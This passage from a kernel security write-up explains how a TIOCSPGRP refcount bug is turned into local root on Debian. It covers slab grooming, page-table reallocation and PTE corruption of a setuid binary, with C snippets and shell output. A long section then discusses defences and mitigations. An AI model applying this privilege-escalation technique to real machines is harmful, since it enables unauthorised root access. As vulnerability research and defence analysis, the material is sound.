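    memcpy(CMSG_DATA(cm), &creds, sizeof(creds));

    // Each queued message holds a reference to the sender's struct pid.
    for (int i = 0; i < count; i++)
        sendmsg(sk[0], &msg, 0);
}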

Because the refcount is smaller at the start of step 5 than the number of references we are about to drop, the pid will be freed at some point during step 5; the next attempt to drop a reference will cause a use-after-free:

struct upid {
        int nr;
        struct pid_namespace *ns;
};

struct pid
{
        atomic_t count;
        unsigned int level;
        /* lists of tasks that use this pid */
        struct hlist_head tasks[PIDTYPE_MAX];
        struct rcu_head rcu;
        struct upid numbers[1];
};
[...]
void put_pid(struct pid *pid)
{
        struct pid_namespace *ns;

        if (!pid)
                return;

        ns = pid->numbers[pid->level].ns;
        if ((atomic_read(&pid->count) == 1) ||
             atomic_dec_and_test(&pid->count)) {
                kmem_cache_free(ns->pid_cachep, pid);
                put_pid_ns(ns);
        }
}

When the object is freed, the SLUB allocator normally replaces the first 8 bytes (sidenote: a different position is chosen starting in 5.7, see Kees' blog) of the freed object with an XOR-obfuscated freelist pointer; therefore, the count and level fields are now effectively random garbage. This means that the load from pid->numbers[pid->level] will now be at some random offset from the pid, in the range from zero to 64 GiB. As long as the machine doesn't have tons of RAM, this will likely cause a kernel segmentation fault. (Yes, I know, that's an absolutely gross and unreliable way to exploit this. It mostly works though, and I only noticed this issue when I already had the whole thing written, so I didn't really want to go back and change it... plus, did I mention that it mostly works?)

Linux in its default configuration, and the configuration shipped by most general-purpose distributions, attempts to fix up unexpected kernel page faults and other types of "oopses" by killing only the crashing thread. Therefore, this kernel page fault is actually useful for us as a signal: Once the thread has died, we know that the object has been freed, and can continue with the rest of the exploit.

If this code looked a bit differently and we were actually reaching a double-free, the SLUB allocator would also detect that and trigger a kernel oops (see set_freepointer() for the CONFIG_SLAB_FREELIST_HARDENED case).

Discarded attack idea: Directly exploiting the UAF at the SLUB level

On the Debian kernel I was looking at, a struct pid in the initial namespace is allocated from the same kmem_cache as struct seq_file and struct epitem - these three slabs have been merged into one by find_mergeable() to reduce memory fragmentation, since their object sizes, alignment requirements, and flags match:

root@deb10:/sys/kernel/slab# ls -l pid
lrwxrwxrwx 1 root root 0 Feb  6 00:09 pid -> :A-0000128
root@deb10:/sys/kernel/slab# ls -l | grep :A-0000128
drwxr-xr-x 2 root root 0 Feb  6 00:09 :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 eventpoll_epi -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 pid -> :A-0000128
lrwxrwxrwx 1 root root 0 Feb  6 00:09 seq_file -> :A-0000128
root@deb10:/sys/kernel/slab# 

A straightforward way to exploit a dangling reference to a SLUB object is to reallocate the object through the same kmem_cache it came from, without ever letting the page reach the page allocator. To figure out whether it's easy to exploit this bug this way, I made a table listing which fields appear at each offset in these three data structures (using pahole -E --hex -C <typename> <path to vmlinux debug info>):

offset | pid                         | eventpoll_epi / epitem (RCU-freed)  | seq_file
0x00   | count.counter (4) (CONTROL) | rbn.__rb_parent_color (8) (TARGET?) | buf (8) (TARGET?)
0x04   | level (4)                   |                                     |
0x08   | tasks[PIDTYPE_PID] (8)      | rbn.rb_right (8) / rcu.func (8)     | size (8)
0x10   | tasks[PIDTYPE_TGID] (8)     | rbn.rb_left (8)                     | from (8)
0x18   | tasks[PIDTYPE_PGID] (8)     | rdllink.next (8)                    | count (8)
0x20   | tasks[PIDTYPE_SID] (8)      | rdllink.prev (8)                    | pad_until (8)
0x28   | rcu.next (8)                | next (8)                            | index (8)
0x30   | rcu.func (8)                | ffd.file (8)                        | read_pos (8)
0x38   | numbers[0].nr (4)           | ffd.fd (4)                          | version (8)
0x3c   | [hole] (4)                  | nwait (4)                           |
0x40   | numbers[0].ns (8)           | pwqlist.next (8)                    | lock (0x20): counter (8)
0x48   | ---                         | pwqlist.prev (8)                    |
0x50   | ---                         | ep (8)                              |
0x58   | ---                         | fllink.next (8)                     |
0x60   | ---                         | fllink.prev (8)                     | op (8)
0x68   | ---                         | ws (8)                              | poll_event (4)
0x6c   | ---                         | [hole] (4)                          |
0x70   | ---                         | event.events (4)                    | file (8)
0x74   | ---                         | event.data (8) (CONTROL)            |
0x78   | ---                         |                                     | private (8) (TARGET?)
0x7c   | ---                         | ---                                 |
0x80   | ---                         | ---                                 | ---

(Blank cells indicate that the member starting at a lower offset spans this offset.)

In this case, reallocating the object as one of those three types didn't seem to me like a nice way forward (although it should be possible to exploit this somehow with some effort, e.g. by using count.counter to corrupt the buf field of seq_file). Also, some systems might be using the slab_nomerge kernel command line flag, which disables this merging behavior.

Another approach that I didn't look into here would have been to try to corrupt the obfuscated SLUB freelist pointer (obfuscation is implemented in freelist_ptr()); but since that stores the pointer in big-endian, count.counter would only effectively let us corrupt the more significant half of the pointer, which would probably be a pain to exploit.

Attack stage: Freeing the object's page to the page allocator

This section will refer to some internals of the SLUB allocator; if you aren't familiar with those, you may want to at least look at slides 2-4 and 13-14 of Christoph Lameter's slab allocator overview talk from 2014. (Note that that talk covers three different allocators; the SLUB allocator is what most systems use nowadays.)

The alternative to exploiting the UAF at the SLUB allocator level is to flush the page out to the page allocator (also called the buddy allocator), which is the last level of dynamic memory allocation on Linux (once the system is far enough into the boot process that the memblock allocator is no longer used). From there, the page can theoretically end up in pretty much any context. We can flush the page out to the page allocator with the following steps:

  1. Instruct the kernel to pin our task to a single CPU (see the sketch after this list). Both SLUB and the page allocator use per-cpu structures, so if the kernel migrates us to a different CPU in the middle, we would fail.
  2. Before allocating the victim struct pid whose refcount will be corrupted, allocate a large number of objects to drain partially-free slab pages of all their unallocated objects. If the victim object (which will be allocated in step 5 below) landed in a page that is already partially used at this point, we wouldn't be able to free that page.
  3. Allocate around objs_per_slab * (1+cpu_partial) objects - in other words, a set of objects that completely fill at least cpu_partial pages, where cpu_partial is the maximum length of the "percpu partial list". Those newly allocated pages that are completely filled with objects are not referenced by SLUB's freelists at this point because SLUB only tracks pages with free objects on its freelists.
  4. Fill objs_per_slab-1 more objects, such that at the end of this step, the "CPU slab" (the page from which allocations will be served first) will not contain anything other than free space and fresh allocations (created in this step).
  5. Allocate the victim object (a struct pid). The victim page (the page from which the victim object came) will usually be the CPU slab from step 4, but if step 4 completely filled the CPU slab, the victim page might also be a new, freshly allocated CPU slab.
  6. Trigger the bug on the victim object to create an uncounted reference, and free the object.
  7. Allocate objs_per_slab+1 more objects. After this, the victim page will be completely filled with allocations from steps 4 and 7, and it won't be the CPU slab anymore (because the last allocation can not have fit into the victim page).
  8. Free all allocations from steps 4 and 7. This causes the victim page to become empty, but does not free the page; the victim page is placed on the percpu partial list once a single object from that page has been freed, and then stays on that list.
  9. Free one object per page from the allocations from step 3. This adds all these pages to the percpu partial list until it reaches the limit cpu_partial, at which point it will be flushed: Pages containing some in-use objects are placed on SLUB's per-NUMA-node partial list, and pages that are completely empty are freed back to the page allocator. (We don't free all allocations from step 3 because we only want the victim page to be freed to the page allocator.) Note that this step requires that every objs_per_slab-th object the allocator gave us in step 3 is on a different page.
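
A minimal sketch of the preliminaries for these steps: pinning to one CPU (step 1) and reading the slab geometry that steps 3, 4, and 7 depend on. The sysfs paths assume the merged cache alias "pid" shown earlier:

#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>

static int read_slab_param(const char *file) {
    char path[128];
    int val = -1;
    snprintf(path, sizeof(path), "/sys/kernel/slab/pid/%s", file);
    FILE *f = fopen(path, "r");
    if (f) { fscanf(f, "%d", &val); fclose(f); }
    return val;
}

void prepare_slab_attack(void) {
    // Step 1: pin ourselves to one CPU so we keep hitting the same
    // per-cpu SLUB and page allocator structures.
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(0, &set);
    sched_setaffinity(0, sizeof(set), &set);

    int objs_per_slab = read_slab_param("objs_per_slab");
    int cpu_partial   = read_slab_param("cpu_partial");
    printf("objs_per_slab=%d cpu_partial=%d\n", objs_per_slab, cpu_partial);
}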

When the page is given to the page allocator, we benefit from the page being order-0 (4 KiB, native page size): For order-0 pages, the page allocator has special freelists, one per CPU+zone+migratetype combination. Pages on these freelists are not normally accessed from other CPUs, and they don't immediately get combined with adjacent free pages to form higher-order free pages.

At this point we are able to perform use-after-free accesses to some offset inside the free victim page, using codepaths that interpret part of the victim page as a struct pid. Note that at this point, we still don't know exactly at which offset inside the victim page the victim object is located.

Attack stage: Reallocating the victim page as a pagetable

At the point where the victim page has reached the page allocator's freelist, it's essentially game over - at this point, the page can be reused as anything in the system, giving us a broad range of options for exploitation. In my opinion, most defences that act after we've reached this point are fairly unreliable.

One type of allocation that is directly served from the page allocator and has nice properties for exploitation are page tables (which have also been used to exploit Rowhammer). One way to abuse the ability to modify a page table would be to enable the read/write bit in a page table entry (PTE) that maps a file page to which we are only supposed to have read access - for example, this could be used to gain write access to part of a setuid binary's .text segment and overwrite it with malicious code.

We don't know at which offset inside the victim page the victim object is located; but since a page table is effectively an array of 8-byte-aligned elements of size 8 and the victim object's alignment is a multiple of that, as long as we spray all elements of the victim array, we don't need to know the victim object's offset.

To allocate a page table full of PTEs mapping the same file page, we have to:

  • prepare by setting up a 2MiB-aligned memory region (because each last-level page table describes 2MiB of virtual memory) containing single-page mmap() mappings of the same file page (meaning each mapping corresponds to one PTE); then
  • trigger allocation of the page table and fill it with PTEs by reading from each mapping (both steps are sketched below)
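
A minimal sketch of those two steps, assuming fd is a read-only file descriptor for the target file (e.g. a setuid binary) and that the freed victim page gets picked up as the new page table:

#include <sys/mman.h>

#define PAGE_SIZE    0x1000UL
#define PTRS_PER_PTE 512
#define REGION       (PTRS_PER_PTE * PAGE_SIZE)  /* 2 MiB per last-level page table */

static volatile char sink;

void spray_ptes(int fd) {
    // Reserve twice the size we need, then pick a 2MiB-aligned base inside it
    // so that all 512 single-page mappings share one last-level page table.
    char *area = mmap(NULL, 2 * REGION, PROT_NONE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    char *base = (char *)(((unsigned long)area + REGION - 1) & ~(REGION - 1));

    for (int i = 0; i < PTRS_PER_PTE; i++)
        mmap(base + i * PAGE_SIZE, PAGE_SIZE, PROT_READ,
             MAP_SHARED | MAP_FIXED, fd, 0);  // every mapping is the same file page

    // Reading each page triggers allocation of the page table and fills its PTEs.
    for (int i = 0; i < PTRS_PER_PTE; i++)
        sink = base[i * PAGE_SIZE];
}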

struct pid has the same alignment as a PTE, and it starts with a 32-bit refcount, so that refcount is guaranteed to overlap the first half of a PTE, which is 64-bit. Because X86 CPUs are little-endian, incrementing the refcount field in the freed struct pid increments the least significant half of the PTE - so it effectively increments the PTE. (Except for the edge case where the least significant half is 0xffffffff, but that's not the case here.)

struct pid: count | level |   tasks[0]  |   tasks[1]  |   tasks[2]  | ... 
pagetable:       PTE      |     PTE     |     PTE     |     PTE     | ...

Therefore we can increment one of the PTEs by repeatedly triggering get_pid(), which tries to increment the refcount of the freed object. This can be turned into the ability to write to the file page as follows:

  • Increment the PTE by 0x42 to set the Read/Write bit and the Dirty bit. (If we didn't set the Dirty bit, the CPU would do it by itself when we write to the corresponding virtual address, so we could also just increment by 0x2 here.)
  • For each mapping, attempt to overwrite its contents with malicious data and ignore page faults.
    • This might throw spurious errors because of outdated TLB entries, but taking a page fault will automatically evict such TLB entries, so if we just attempt the write twice, this can't happen on the second write (modulo CPU migration, as mentioned above).
    • One easy way to ignore page faults is to let the kernel perform the memory write using pread(), which will return -EFAULT on fault.

If the kernel notices the Dirty bit later on, that might trigger writeback, which could crash the kernel if the mapping isn't set up for writing. Therefore, we have to reset the Dirty bit. We can't reliably decrement the PTE because put_pid() inefficiently accesses pid->numbers[pid->level] even when the refcount isn't dropping to zero, but we can increment it by an additional 0x80-0x42=0x3e, which means the final value of the PTE, compared to the initial value, will just have the additional bit 0x80 set, which the kernel ignores.

Afterwards, we launch the setuid executable (which, in the version in the pagecache, now contains the code we injected), and gain root privileges:

user@deb10:~/tiocspgrp$ make
as -o rootshell.o rootshell.S
ld -o rootshell rootshell.o --nmagic
gcc -Wall -o poc poc.c
user@deb10:~/tiocspgrp$ ./poc
starting up...
executing in first level child process, setting up session and PTY pair...
setting up unix sockets for ucreds spam...
draining pcpu and node partial pages
preparing for flushing pcpu partial pages
launching child process
child is 1448
ucreds spam done, struct pid refcount should be lifted. starting to skew refcount...
refcount should now be skewed, child exiting
child exited cleanly
waiting for RCU call...
bpf load with rlim 0x0: -1 (Operation not permitted)
bpf load with rlim 0x1000: 452 (Success)
bpf load success with rlim 0x1000: got fd 452
....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
RCU callbacks executed
gonna try to free the pid...
double-free child died with signal 9 after dropping 9990 references (99%)
hopefully reallocated as an L1 pagetable now
PTE forcibly marked WRITE | DIRTY (hopefully)
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
clobber via corrupted PTE succeeded in page 0, 128-byte-allocation index 3, returned 856
bash: cannot set terminal process group (1447): Inappropriate ioctl for device
bash: no job control in this shell
root@deb10:/home/user/tiocspgrp# id
uid=0(root) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),113(scanner),120(wireshark)
root@deb10:/home/user/tiocspgrp# 

Note that nothing in this whole exploit requires us to leak any kernel-virtual or physical addresses, partly because we have an increment primitive instead of a plain write; and it also doesn't involve directly influencing the instruction pointer.

Defence

This section describes different ways in which this exploit could perhaps have been prevented from working. To assist the reader, the titles of some of the subsections refer back to specific exploit stages from the section above.

Against bugs being reachable: Attack surface reduction

A potential first line of defense against many kernel security issues is to only make kernel subsystems available to code that needs access to them. If an attacker does not have direct access to a vulnerable subsystem and doesn't have sufficient influence over a system component with access to make it trigger the issue, the issue is effectively unexploitable from the attacker's security context.

Pseudoterminals are (more or less) only necessary for interactively serving users who have shell access (or something resembling that), including:

  • terminal emulators inside graphical user sessions
  • SSH servers
  • screen sessions started from various types of terminals

Things like webservers or phone apps won't normally need access to such devices; but there are exceptions. For example:

  • a web server is used to provide a remote root shell for system administration
  • a phone app's purpose is to make a shell available to the user
  • a shell script uses expect to interact with a binary that requires a terminal for input/output

In my opinion, the biggest limits on attack surface reduction as a defensive strategy are:

  1. It exposes a workaround to an implementation concern of the kernel (potential memory safety issues) in user-facing API, which can lead to compatibility issues and maintenance overhead - for example, from a security standpoint, I think it might be a good idea to require phone apps and systemd services to declare their intention to use the PTY subsystem at install time, but that would be an API change requiring some sort of action from application authors, creating friction that wouldn't be necessary if we were confident that the kernel is working properly. This might get especially messy in the case of software that invokes external binaries depending on configuration, e.g. a web server that needs PTY access when it is used for server administration. (This is somewhat less complicated when a benign-but-potentially-exploitable application actively applies restrictions to itself; but not every application author is necessarily willing to design a fine-grained sandbox for their code, and even then, there may be compatibility issues caused by libraries outside the application author's control.)
  2. It can't protect a subsystem from a context that fundamentally needs access to it. (E.g. Android's /dev/binder is directly accessible by Chrome renderers on Android because they have Android code running inside them.)
  3. It means that decisions that ought to not influence the security of a system (making an API that does not grant extra privileges available to some potentially-untrusted context) essentially involve a security tradeoff.

Still, in practice, I believe that attack surface reduction mechanisms (especially seccomp) are currently some of the most important defense mechanisms on Linux.

Against bugs in source code: Compile-time locking validation

The bug in TIOCSPGRP was a fairly straightforward violation of a straightforward locking rule: While a tty_struct is live, accessing its pgrp member is forbidden unless the ctrl_lock of the same tty_struct is held. This rule is sufficiently simple that it wouldn't be entirely unreasonable to expect the compiler to be able to verify it - as long as you somehow inform the compiler about this rule, because figuring out the intended locking rules just from looking at a piece of code can often be hard even for humans (especially when some of the code is incorrect).

When you are starting a new project from scratch, the overall best way to approach this is to use a memory-safe language - in other words, a language that has explicitly been designed such that the programmer has to provide the compiler with enough information about intended memory safety semantics that the compiler can automatically verify them. But for existing codebases, it might be worth looking into how much of this can be retrofitted.

Clang's Thread Safety Analysis feature does something vaguely like what we'd need to verify the locking in this situation:

$ nl -ba -s' ' thread-safety-test.cpp | sed 's|^   ||'
  1 struct __attribute__((capability("mutex"))) mutex {
  2 };
  3 
  4 void lock_mutex(struct mutex *p) __attribute__((acquire_capability(*p)));
  5 void unlock_mutex(struct mutex *p) __attribute__((release_capability(*p)));
  6 
  7 struct foo {
  8     int a __attribute__((guarded_by(mutex)));
  9     struct mutex mutex;
 10 };
 11 
 12 int good(struct foo *p1, struct foo *p2) {
 13     lock_mutex(&p1->mutex);
 14     int result = p1->a;
 15     unlock_mutex(&p1->mutex);
 16     return result;
 17 }
 18 
 19 int bogus(struct foo *p1, struct foo *p2) {
 20     lock_mutex(&p1->mutex);
 21     int result = p2->a;
 22     unlock_mutex(&p1->mutex);
 23     return result;
 24 }
$ clang++ -c -o thread-safety-test.o thread-safety-test.cpp -Wall -Wthread-safety
thread-safety-test.cpp:21:22: warning: reading variable 'a' requires holding mutex 'p2->mutex' [-Wthread-safety-precise]
    int result = p2->a;
                     ^
thread-safety-test.cpp:21:22: note: found near match 'p1->mutex'
1 warning generated.
$ 

However, this does not currently work when compiling as C code because the guarded_by attribute can't find the other struct member; it seems to have been designed mostly for use in C++ code. A more fundamental problem is that it also doesn't appear to have built-in support for distinguishing the different rules for accessing a struct member depending on the lifetime state of the object. For example, almost all objects with locked members will have initialization/destruction functions that have exclusive access to the entire object and can access members without locking. (The lock might not even be initialized in those states.)

Some objects also have more lifetime states; in particular, for many objects with RCU-managed lifetime, only a subset of the members may be accessed through an RCU reference without having upgraded the reference to a refcounted one beforehand. Perhaps this could be addressed by introducing a new type attribute that can be used to mark pointers to structs in special lifetime states? (For C++ code, Clang's Thread Safety Analysis simply disables all checks in all constructor/destructor functions.)

I am hopeful that, with some extensions, something vaguely like Clang's Thread Safety Analysis could be used to retrofit some level of compile-time safety against unintended data races. This will require adding a lot of annotations, in particular to headers, to document intended locking semantics; but such annotations are probably anyway necessary to enable productive work on a complex codebase. In my experience, when there are no detailed comments/annotations on locking rules, every attempt to change a piece of code you're not intimately familiar with (without introducing horrible memory safety bugs) turns into a foray into the thicket of the surrounding call graphs, trying to unravel the intentions behind the code.

The one big downside is that this requires getting the development community for the codebase on board with the idea of backfilling and maintaining such annotations. And someone has to write the analysis tooling that can verify the annotations.

At the moment, the Linux kernel does have some very coarse locking validation via sparse; but this infrastructure is not capable of detecting situations where the wrong lock is used or validating that a struct member is protected by a lock. It also can't properly deal with things like conditional locking, which makes it hard to use for anything other than spinlocks/RCU. The kernel's runtime locking validation via LOCKDEP is more advanced, but focused mostly on the locking correctness of RCU pointers and on deadlock detection (its main purpose); again, there is no mechanism to, for example, automatically validate that a given struct member is only accessed under a specific lock (which would probably also be quite costly to implement with runtime validation). Also, as a runtime validation mechanism, it can't discover errors in code that isn't executed during testing (although it can combine separately observed behavior into race scenarios without ever actually observing the race).

Against bugs in source code: Global static locking analysis

An alternative approach to checking memory safety rules at compile time is to do it either after the entire codebase has been compiled, or with an external tool that analyzes the entire codebase. This allows the analysis tooling to perform analysis across compilation units, reducing the amount of information that needs to be made explicit in headers. This may be a more viable approach if peppering annotations everywhere across headers isn't viable; but it also reduces the utility to human readers of the code, unless the inferred semantics are made visible to them through some special code viewer. It might also be less ergonomic in the long run if changes to one part of the kernel could make the verification of other parts fail - especially if those failures only show up in some configurations.

I think global static analysis is probably a good tool for finding some subsets of bugs, and it might also help with finding the worst-case depth of kernel stacks or proving the absence of deadlocks, but it's probably less suited for proving memory safety correctness?

Against exploit primitives: Attack primitive reduction via syscall restrictions

(Yes, I made up that name because I thought that capturing this under "Attack surface reduction" is too muddy.)

Because allocator fastpaths (both in SLUB and in the page allocator) are implemented using per-CPU data structures, the ease and reliability of exploits that want to coax the kernel's memory allocators into reallocating memory in specific ways can be improved if the attacker has fine-grained control over the assignment of exploit threads to CPU cores. I'm calling such a capability, which provides a way to facilitate exploitation by influencing relevant system state/behavior, an "attack primitive" here. Luckily for us, Linux allows tasks to pin themselves to specific CPU cores without requiring any privilege using the sched_setaffinity() syscall.

(As a different example, one primitive that can provide an attacker with fairly powerful capabilities is being able to indefinitely stall kernel faults on userspace addresses via FUSE or userfaultfd.)

Just like in the section "Attack surface reduction" above, an attacker's ability to use these primitives can be reduced by filtering syscalls; but while the mechanism and the compatibility concerns are similar, the rest is fairly different:

Attack primitive reduction does not normally reliably prevent a bug from being exploited; and an attacker will sometimes even be able to obtain a similar but shoddier (more complicated, less reliable, less generic, ...) primitive indirectly.

Attack surface reduction is about limiting access to code that is suspected to contain exploitable bugs; in a codebase written in a memory-unsafe language, that tends to apply to pretty much the entire codebase. Attack surface reduction is often fairly opportunistic: You permit the things you need, and deny the rest by default.

Attack primitive reduction limits access to code that is suspected or known to provide (sometimes very specific) exploitation primitives. For example, one might decide to specifically forbid access to FUSE and userfaultfd for most code because of their utility for kernel exploitation, and, if one of those interfaces is truly needed, design a workaround that avoids exposing the attack primitive to userspace. This is different from attack surface reduction, where it often makes sense to permit access to any feature that a legitimate workload wants to use.

A nice example of an attack primitive reduction is the sysctl vm.unprivileged_userfaultfd, which was first introduced so that userfaultfd can be made completely inaccessible to normal users and was then later adjusted so that users can be granted access to part of its functionality without gaining the dangerous attack primitive. (But if you can create unprivileged user namespaces, you can still use FUSE to get an equivalent effect.)

When maintaining lists of allowed syscalls for a sandboxed system component, or something along those lines, it may be a good idea to explicitly track which syscalls are explicitly forbidden for attack primitive reduction reasons, or similarly strong reasons - otherwise one might accidentally end up permitting them in the future. (I guess that's kind of similar to issues that one can run into when maintaining ACLs...)

But like in the previous section, attack primitive reduction also tends to rely on making some functionality unavailable, and so it might not be viable in all situations. For example, newer versions of Android deliberately indirectly give apps access to FUSE through the AppFuse mechanism. (That API doesn't actually give an app direct access to /dev/fuse, but it does forward read/write requests to the app.)

Against oops-based oracles: Lockout or panic on crash

The ability to recover from kernel oopses in an exploit can help an attacker compensate for a lack of information about system state. Under some circumstances, it can even serve as a binary oracle that can be used to more or less perform a binary search for a value, or something like that.

(It used to be even worse on some distributions, where dmesg was accessible for unprivileged users; so if you managed to trigger an oops or WARN, you could then grab the register states at all IRET frames in the kernel stack, which could be used to leak things like kernel pointers. Luckily nowadays most distributions, including Ubuntu 20.10, restrict dmesg access.)

Android and Chrome OS nowadays set the kernel's panic_on_oops flag, meaning the machine will immediately restart when a kernel oops happens. This makes it hard to use oopsing as part of an exploit, and arguably also makes more sense from a reliability standpoint - the system will be down for a bit, and it will lose its existing state, but it will also reset into a known-good state instead of continuing in a potentially half-broken state, especially if the crashing thread was holding mutexes that can never again be released, or things like that. On the other hand, if some service crashes on a desktop system, perhaps that shouldn't cause the whole system to immediately go down and make you lose unsaved state - so panic_on_oops might be too drastic there.

A good solution to this might require a more fine-grained approach. (For example, grsecurity has for a long time had the ability to lock out specific UIDs that have caused crashes.) Perhaps it would make sense to allow the init daemon to use different policies for crashes in different services/sessions/UIDs?

Against UAF access: Deterministic UAF mitigation

One defense that would reliably stop an exploit for this issue would be a deterministic use-after-free mitigation. Such a mitigation would reliably protect the memory formerly occupied by the object from accesses through dangling pointers to the object, at least once the memory has been reused for a different purpose (including reuse to store heap metadata). For write operations, this probably requires either atomicity of the access check and the actual write or an RCU-like delayed freeing mechanism. For simple read operations, it can also be implemented by ordering the access check after the read, but before the read value is used.

A big downside of this approach on its own is that extra checks on every memory access will probably come with an extremely high efficiency penalty, especially if the mitigation can not make any assumptions about what kinds of parallel accesses might be happening to an object, or what semantics pointers have. (The proof-of-concept implementation I presented at LSSNA 2020 (slides, recording) had CPU overhead roughly in the range 60%-159% in kernel-heavy benchmarks, and ~8% for a very userspace-heavy benchmark.)

Unfortunately, even a deterministic use-after-free mitigation often won't be enough to deterministically limit the blast radius of something like a refcounting mistake to the object in which it occurred. Consider a case where two codepaths concurrently operate on the same object: Codepath A assumes that the object is live and subject to normal locking rules. Codepath B knows that the reference count reached zero, assumes that it therefore has exclusive access to the object (meaning all members are mutable without any locking requirements), and is trying to tear down the object. Codepath B might then start dropping references the object was holding on other objects while codepath A is following the same references. This could then lead to use-after-frees on pointed-to objects. If all data structures are subject to the same mitigation, this might not be too much of a problem; but if some data structures (like struct page) are not protected, it might permit a mitigation bypass.

Similar issues apply to data structures with union members that are used in different object states; for example, here's some random kernel data structure with an rcu_head in a union (just a random example, there isn't anything wrong with this code as far as I know):

struct allowedips_node {
    struct wg_peer __rcu *peer;
    struct allowedips_node __rcu *bit[2];
    /* While it may seem scandalous that we waste space for v4,
     * we're alloc'ing to the nearest power of 2 anyway, so this
     * doesn't actually make a difference.
     */
    u8 bits[16] __aligned(__alignof(u64));
    u8 cidr, bit_at_a, bit_at_b, bitlen;

    /* Keep rarely used list at bottom to be beyond cache line. */
    union {
        struct list_head peer_list;
        struct rcu_head rcu;
    };
};

As long as everything is working properly, the peer_list member is only used while the object is live, and the rcu member is only used after the object has been scheduled for delayed freeing; so this code is completely fine. But if a bug somehow caused the peer_list to be read after the rcu member has been initialized, type confusion would result.
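Here's a tiny userspace toy (invented for illustration, not related to the WireGuard code above) that makes the hazard concrete - once the teardown-state member of the union has been written, a codepath that still believes the object is live will reinterpret that data:

#include <stdio.h>

struct toy_node {
  union {
    struct { struct toy_node *next, *prev; } peer_list; /* object is live */
    struct { void (*func)(struct toy_node *); } rcu;    /* teardown pending */
  };
};

static void free_cb(struct toy_node *n) { (void)n; /* would free n */ }

int main(void) {
  struct toy_node n = { .peer_list = { &n, &n } };  /* live state */
  n.rcu.func = free_cb;        /* object scheduled for delayed freeing */
  /* buggy codepath still treating the object as live: the callback
   * pointer now masquerades as a list pointer */
  printf("peer_list.next = %p (free_cb is at %p)\n",
         (void *)n.peer_list.next, (void *)free_cb);
}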

In my opinion, this demonstrates that while UAF mitigations do have a lot of value (and would have reliably prevented exploitation of this specific bug), a use-after-free is just one possible consequence of the symptom class "object state confusion" (which may or may not be the same as the bug class of the root cause). It would be even better to enforce rules on object states, and ensure that, for example, an object can't be accessed through a "refcounted" reference anymore after the refcount has reached zero and the object has logically transitioned into a state like "non-RCU members are exclusively owned by thread performing teardown" or "RCU callback pending, non-RCU members are uninitialized" or "exclusive access to RCU-protected members granted to thread performing teardown, other members are uninitialized". Of course, doing this as a runtime mitigation would be even costlier and messier than a reliable UAF mitigation; this level of protection is probably only realistic with at least some level of annotations and static validation.

Against UAF access: Probabilistic UAF mitigation; pointer leaks

Summary: Some types of probabilistic UAF mitigation break if the attacker can leak information about pointer values; and information about pointer values easily leaks to userspace, e.g. through pointer comparisons in map/set-like structures.

If a deterministic UAF mitigation is too costly, an alternative is to do it probabilistically; for example, by tagging pointers with a small number of bits that are checked against object metadata on access, and then changing that object metadata when objects are freed.
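As a toy model of such a scheme (invented for illustration; a real implementation would keep the metadata in allocator structures and check it on every dereference), a 4-bit tag could be stored in the unused upper bits of a pointer and compared against per-object metadata on access:

#include <assert.h>
#include <stdint.h>
#include <stdlib.h>

#define TAG_SHIFT 56
#define TAG_MASK  ((uintptr_t)0xf << TAG_SHIFT)

struct obj { uint8_t tag; long data; };  /* tag = per-object metadata */

static void *make_ref(struct obj *o) {   /* hand out a tagged pointer */
  return (void *)((uintptr_t)o | ((uintptr_t)o->tag << TAG_SHIFT));
}

static struct obj *deref(void *ref) {    /* tag check on access */
  struct obj *o = (struct obj *)((uintptr_t)ref & ~TAG_MASK);
  assert((((uintptr_t)ref & TAG_MASK) >> TAG_SHIFT) == o->tag);
  return o;
}

int main(void) {
  struct obj *o = calloc(1, sizeof(*o));
  o->tag = rand() & 0xf;
  void *ref = make_ref(o);
  deref(ref)->data = 123;        /* tags match: access allowed */
  o->tag = (o->tag + 1) & 0xf;   /* "free" the object: retag the memory */
  deref(ref)->data = 456;        /* dangling access: assertion fires */
}

With only four tag bits, a dangling access with a guessed tag still succeeds with probability 1/16 - which is what makes this kind of mitigation probabilistic rather than deterministic.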

The downside of this approach is that information leaks can be used to break the protection. One example of a type of information leak that I'd like to highlight (without any judgment on its relative importance compared to other types of information leaks) is intentional pointer comparisons, which have quite a few facets.

A relatively straightforward example where this could be an issue is the kcmp() syscall. This syscall compares two kernel objects using an arithmetic comparison of their permuted pointers (using a per-boot randomized permutation, see kptr_obfuscate()) and returns the result of the comparison (smaller, equal or greater). This gives userspace a way to order handles to kernel objects (e.g. file descriptors) based on the identities of those kernel objects (e.g. struct file instances), which in turn allows userspace to group a set of such handles by backing kernel object in O(n*log(n)) time using a standard sorting algorithm.
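As a quick illustration (a demo written for this writeup, not part of the original exploit), this is what the interface looks like from userspace:

#define _GNU_SOURCE
#include <fcntl.h>
#include <linux/kcmp.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(void) {
  pid_t pid = getpid();
  int a = open("/dev/null", O_RDONLY);  /* struct file #1 */
  int b = open("/dev/null", O_RDONLY);  /* struct file #2 */
  int a2 = dup(a);                      /* second fd for struct file #1 */

  /* 0 means both fds refer to the same struct file; 1 or 2 expose the
   * ordering of the two permuted pointers */
  printf("a vs a2: %ld\n", syscall(SYS_kcmp, pid, pid, KCMP_FILE, a, a2));
  printf("a vs b:  %ld\n", syscall(SYS_kcmp, pid, pid, KCMP_FILE, a, b));
}

The first comparison prints 0 (same struct file instance); the second prints 1 or 2, depending on the ordering of the two permuted pointers.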

This syscall can be abused for improving the reliability of use-after-free exploits against some struct types because it checks whether two pointers to kernel objects are equal without accessing those objects: An attacker can allocate an object, somehow create a reference to the object that is not counted properly, free the object, reallocate it, and then verify whether the reallocation indeed reused the same address by comparing the dangling reference and a reference to the new object with kcmp(). If kcmp() includes the pointer's tag bits in the comparison, this would likely also permit breaking probabilistic UAF mitigations.

Essentially the same concern applies when a kernel pointer is encrypted and then given to userspace in fuse_lock_owner_id(), which encrypts the pointer to a files_struct with an open-coded version of XTEA before passing it to a FUSE daemon.

